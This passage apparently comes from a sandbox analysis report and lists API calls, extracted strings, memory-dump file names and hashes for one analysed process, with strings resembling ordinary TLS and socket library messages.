                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a71bbcaca3df796b5cc798ee14f8b75764bd8a5a3c99f346f9411258e134d78b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311AFF2E101115BDF20DE79C884B5A72D89B88760F4E4464FC0ADB201EA28ECA083B1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree$strchr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1739957132-0
                                                                                                                                                                                                                                                            • Opcode ID: 61b1699c62b800e7ff8071e69d398376b60fb2ff0890c6ea5d28814f2d4a9147
                                                                                                                                                                                                                                                            • Instruction ID: 1078e3d674533e74ef58aedbeb72588653e39f1a6753046c9e19bdc7b8504811
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61b1699c62b800e7ff8071e69d398376b60fb2ff0890c6ea5d28814f2d4a9147
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921AEF0A247429FDB19DE29D805759B3E5AB44314F14457AF4899B280EB34ED21CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 004B76F9
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002314B2), ref: 004B770A
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004B7712
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004B771A
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002314B2), ref: 004B7729
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                                            • Opcode ID: 8c6e2177aa218f9e96adf482383850a0278479eb136784ea74f3596c82c7ce23
                                                                                                                                                                                                                                                            • Instruction ID: 2ccf532161c4d957ba3fa0f1b8ed82b634e48d585fa0d72dd375476e92d9fab4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c6e2177aa218f9e96adf482383850a0278479eb136784ea74f3596c82c7ce23
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 731173B55093018FC710DF79F98898BBBE0FB88265F151C3AE845C7320EB35E5598B92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0025C5C9
                                                                                                                                                                                                                                                              • Part of subcall function 0024B510: Sleep.KERNEL32(?), ref: 0024B553
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 0025C70C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • select/poll on SSL socket, errno: %d, xrefs: 0025C713
                                                                                                                                                                                                                                                            • schannel: timed out sending data (bytes sent: %zd), xrefs: 0025C6FD, 0025C729
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastSleepmemcpy
                                                                                                                                                                                                                                                            • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                                                                                                                                                                                                                                            • API String ID: 2868755610-3891197721
                                                                                                                                                                                                                                                            • Opcode ID: 4f888fad95dfe8c45ac40ad6d94e1db0fff2b79282dc95ec6f4300fa03a906e1
                                                                                                                                                                                                                                                            • Instruction ID: 95c3d3ddf27ed20d97d208abcecb9010970cca1083d3aaca8231bc6842af49a8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f888fad95dfe8c45ac40ad6d94e1db0fff2b79282dc95ec6f4300fa03a906e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5617D702183009FD710DF19D884B2ABBE9BF88318F24456DF9598B391E775E928CF5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlenstrtoul
                                                                                                                                                                                                                                                            • String ID: $%
                                                                                                                                                                                                                                                            • API String ID: 4005410869-2111875603
                                                                                                                                                                                                                                                            • Opcode ID: bf935e89f33d3480677cc09d98296631b504f3f6c762d20ad09a4a351b51b277
                                                                                                                                                                                                                                                            • Instruction ID: 8ff95bdd764a1262988e1fbb37b2ae237c5f4c0efc41936b687cf8eb231b9bad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf935e89f33d3480677cc09d98296631b504f3f6c762d20ad09a4a351b51b277
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 093138B592C3419FD715DF2A980075BBBEA9FA4344F48443EF8C987352E635D828CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastmemcpyrecv
                                                                                                                                                                                                                                                            • String ID: Recv failure: %s
                                                                                                                                                                                                                                                            • API String ID: 770192775-4276829032
                                                                                                                                                                                                                                                            • Opcode ID: 9357038cc9fff79918fc7a90b3f8f95d68018a4aa91d9e791c1f54d632b85989
                                                                                                                                                                                                                                                            • Instruction ID: a01a2142bdbdf4302ff3cad1e084c554485c358261a882202f66b15f1ffabc05
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9357038cc9fff79918fc7a90b3f8f95d68018a4aa91d9e791c1f54d632b85989
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07318C71704606AFD710CF28E880B9ABBE9FB88328F188638E85897350D331ED508B91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: freefwritemalloc
                                                                                                                                                                                                                                                            • String ID: 1.2.11
                                                                                                                                                                                                                                                            • API String ID: 3327534052-4284987526
                                                                                                                                                                                                                                                            • Opcode ID: eb9979032ff94d0468af5211c061accdb67dae46e2d30437ef416f7294a5cbbc
                                                                                                                                                                                                                                                            • Instruction ID: 36e4742cdab6cbb016f2521d48b19eba83dd06c85d26056c4fd9e54c37808ce3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb9979032ff94d0468af5211c061accdb67dae46e2d30437ef416f7294a5cbbc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 782193F19083016BE300AF11DC55B4B7AD8EB9279CF00492DF5985A282E7FAC658CBD7
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: mallocstrlen
                                                                                                                                                                                                                                                            • String ID: \%03o
                                                                                                                                                                                                                                                            • API String ID: 770973918-2703259314
                                                                                                                                                                                                                                                            • Opcode ID: e826358ff4d6f0de6be7c7dc3b69f45a9de1eb2a4617041e8f74b4e051a215be
                                                                                                                                                                                                                                                            • Instruction ID: 410d7b0df4e12b3cced202e825cba452dd2a27f527ef988963c3874578f23789
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e826358ff4d6f0de6be7c7dc3b69f45a9de1eb2a4617041e8f74b4e051a215be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5215B51534284A6EB084F645CD1B9B3698FF01318F58C265EE454A252F3B5C6788BAB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfreestrstr
                                                                                                                                                                                                                                                            • String ID: ;auto
                                                                                                                                                                                                                                                            • API String ID: 408984727-1462600812
                                                                                                                                                                                                                                                            • Opcode ID: bbda897eb8b47bfb3aca4bbca88dae13d541115e39ef23a296dec6c402781c6d
                                                                                                                                                                                                                                                            • Instruction ID: 3a9a1a375ffdb8ed6ecceb3b5a30c842eb80aa0e2fac8a135c75c6ba5f67e411
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbda897eb8b47bfb3aca4bbca88dae13d541115e39ef23a296dec6c402781c6d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24118FB06243428FEB04DF28C84579A77E1BF80348F1445A9F4559F291DB79DD62CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fclosefopenstrcmp
                                                                                                                                                                                                                                                            • String ID: Failed to open %s!
                                                                                                                                                                                                                                                            • API String ID: 3326340520-3671342594
                                                                                                                                                                                                                                                            • Opcode ID: 930b9c31f03cf3d9937272d07ac3f188223f890740551c3bf2fd3f4b0087db62
                                                                                                                                                                                                                                                            • Instruction ID: 836a968d1d9cb15cc4280ca305115df62fbcf1dc4c6cb02f2a4c07eac105f4d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 930b9c31f03cf3d9937272d07ac3f188223f890740551c3bf2fd3f4b0087db62
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B111E0F1A24305AFCB10DF14E945B5AB3F1BB84304F14066AF816AB2D1DB75E970CBA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0024513A
                                                                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0024515F
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: memset.MSVCRT ref: 00251909
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 0025193C
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00251943
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 0025194D
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00251954
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00251960
                                                                                                                                                                                                                                                              • Part of subcall function 002518C0: VerifyVersionInfoA.KERNEL32(?,00000033,00000000), ref: 0025196D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersiongetsockoptmemsetsetsockopt
                                                                                                                                                                                                                                                            • String ID: @$ @
                                                                                                                                                                                                                                                            • API String ID: 1669800062-1089145642
                                                                                                                                                                                                                                                            • Opcode ID: a85b53f16412eb191ac7c8f5a606b15f2c4c29474d0f3a1963aebde484e4eda8
                                                                                                                                                                                                                                                            • Instruction ID: 958df2cd09b0b4120142f059b4df944b044223fbafe7485c411b17bcb0c6c6ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a85b53f16412eb191ac7c8f5a606b15f2c4c29474d0f3a1963aebde484e4eda8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01A270224712ABF7245F10EC0AB6737D8AF50B44F004028FE8DAA1D1E3F588589B5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0024508E
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32(?,00000004), ref: 002450A8
                                                                                                                                                                                                                                                              • Part of subcall function 00266FB0: strlen.MSVCRT ref: 00267002
                                                                                                                                                                                                                                                              • Part of subcall function 00266FB0: strlen.MSVCRT ref: 00267039
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$ErrorLastsetsockopt
                                                                                                                                                                                                                                                            • String ID: Could not set TCP_NODELAY: %s$TCP_NODELAY set
                                                                                                                                                                                                                                                            • API String ID: 1030407954-1562148346
                                                                                                                                                                                                                                                            • Opcode ID: 759197fc4a5f3c77480e86c02f7dbd2028c19f7506de9e1af8294d13d3ae9704
                                                                                                                                                                                                                                                            • Instruction ID: 538f1a5284421b5b9eda594a10267cf02b54eab1cd548f1637ac1d226c061545
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 759197fc4a5f3c77480e86c02f7dbd2028c19f7506de9e1af8294d13d3ae9704
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CF0A7F6A50710BBD2106B20BC0BF5F765CEF56711F050015FD45A2381E3A6696846F3
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
